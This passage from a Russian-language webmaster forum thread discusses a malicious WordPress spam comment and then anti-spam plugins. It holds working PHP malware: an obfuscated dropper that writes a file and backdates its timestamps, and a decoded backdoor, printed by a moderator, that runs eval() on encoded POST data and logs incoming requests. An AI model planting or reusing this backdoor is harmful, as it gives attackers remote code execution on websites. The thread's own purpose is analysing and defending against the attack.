slRuhcnM7mogKrdZqNIf7+ULx6s5V6Cz1JRKXluyfR1gZdctA+0gN53dkfwRCMn5zA3ssS9NcsbjaK+/bGeftkeBxbcEAMUk6Y8687YWPb8v4lSZUcuLtnRDcijOPHf+R6Pk81c8mKXEPIgJkqwoj56IifCabKeQ/Dwtx58HzIMn+Gm/6ixKkCFxGjwQWGFgthfsO0rvRimq14L4AP4oNUm42E/uiMCbyyu1txOSxZtXwSNTvMO1d1JuzCHsVdjwr534ek0DFSSeQXkmNVMhLNMB1rr79KCJIAAIIgUYKX/u8/f//+/d//AQ=="))); ?>'; $mtime = filemtime(dirname($file)); $fh = fopen($file, 'w'); fwrite($fh, $src); fclose($fh); touch($file, $mtime, $mtime); touch(dirname($file), $mtime, $mtime);

 

А судя по некоторым строчкам, код помоему реально хотел открыть доступ к вашей админ панели, тем самым взломать ваш сайт

 

PS^ Весь я думаю переводить не стоит, хотя если хотите, пишите в ЛС

Скрипт серьезный или просто, какой-то школохацкер хотел взломать

Link to post
Share on other sites
Guest werstey

то есть беспокоиться мне не нужно, у меня стоит галочка одобрять вручную комментарии, удалил полностью комментарий с коризы

Беспокоиться всегда нужно, проверьте нет ли дыр в плагинах которые стоят у вас и проверьте фильтрацию входящих параметров. Если Вы это делать не умеете, попросите это сделать своего хостера.    

Link to post
Share on other sites
Guest werstey

Скрипт серьезный или просто, какой-то школохацкер хотел взломать

Скрипт нормальный, а школохацкер или нешколохацкер это только ему известно.

Link to post
Share on other sites
  • Модератор

Кстати, внутри абракадабра расшифровывается как (Упаковано 28 раз base64_decode)

@error_reporting(0); @ini_set("display_errors",0); @ini_set("log_errors",0); @ini_set("error_log",0); if (isset($_GET['r'])) { print $_GET['r']; } elseif (isset($_POST['e'])) { eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); } elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } exit;
Link to post
Share on other sites
  • Модератор

Лично отказался от WP-комментариев и Вам советую. Не хватает временивремени и терпения удалять кучу спам-комментов.

Кстати, эта проблема решается очень просто. Не нужны никакие каптчи, ни щепетильные настройки...

 

Дело в том, что поля у Вордпресса имеют стандартные имена и куча ботов нацелены на их заполнение. Стоит появится сайту в поисковой выдаче, спам-боты практически сразу заносят его с свой список.

 

Достаточно установить плагин "BotBlocker" (можно не заморачиваться с его настройками, а просто активировать) и спам как рукой снимет! Плагин как раз меняет имена полей для заполнения: живому человеку не заметно, а робот не пройдет.

Link to post
Share on other sites

Кстати, эта проблема решается очень просто. Не нужны никакие каптчи, ни щепетильные настройки...

 

Дело в том, что поля у Вордпресса имеют стандартные имена и куча ботов нацелены на их заполнение. Стоит появится сайту в поисковой выдаче, спам-боты практически сразу заносят его с свой список.

 

Достаточно установить плагин "BotBlocker" (можно не заморачиваться с его настройками, а просто активировать) и спам как рукой снимет! Плагин как раз меняет имена полей для заполнения: живому человеку не заметно, а робот не пройдет.

 

Или как вариант, плагин Akisment, у меня стоит, спам хорошо фильтрует, а удаляются в два клика все.

Link to post
Share on other sites
  • VIP

Лично отказался от WP-комментариев и Вам советую. Не хватает временивремени и терпения удалять кучу спам-комментов.

Просто вы не в курсе плагина, который блокирует весь мусор.  И не нужно советовать того, в чем сами не сильны :)

Link to post
Share on other sites

 

 


Просто вы не в курсе плагина, который блокирует весь мусор. И не нужно советовать того, в чем сами не сильны

Не всегда. Акисмет не зря идет в базовой комплектации, но есть сайты, когда коменты вообще не нужны, ибо ими не пользуются целевые посетители

Link to post
Share on other sites
  • VIP

Не поверите, но призаходе на эту страницу мой антивирус закричал "ОБНАРУЖЕНА ВИРУСНАЯ УГРОЗА". 

 

САМ НЕ ОЖИДАЛ, ЖОВАНЫЙ КОТ, аж дёрнулся! Кроме шуток....  :ph34r:

Link to post
Share on other sites
  • VIP

Не всегда. Акисмет не зря идет в базовой комплектации, но есть сайты, когда коменты вообще не нужны, ибо ими не пользуются целевые посетители

Я про Акисмет ни слова не сказал. Видимо вы тоже не очень разбираетесь в WordPress, без обид, но сообщение было адресовано не вам.

Link to post
Share on other sites
  • 4 weeks later...

Лично отказался от WP-комментариев и Вам советую. Не хватает временивремени и терпения удалять кучу спам-комментов.

Почему бы Вам плагин каптчи не попробовать. у меня весь спам исчез

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...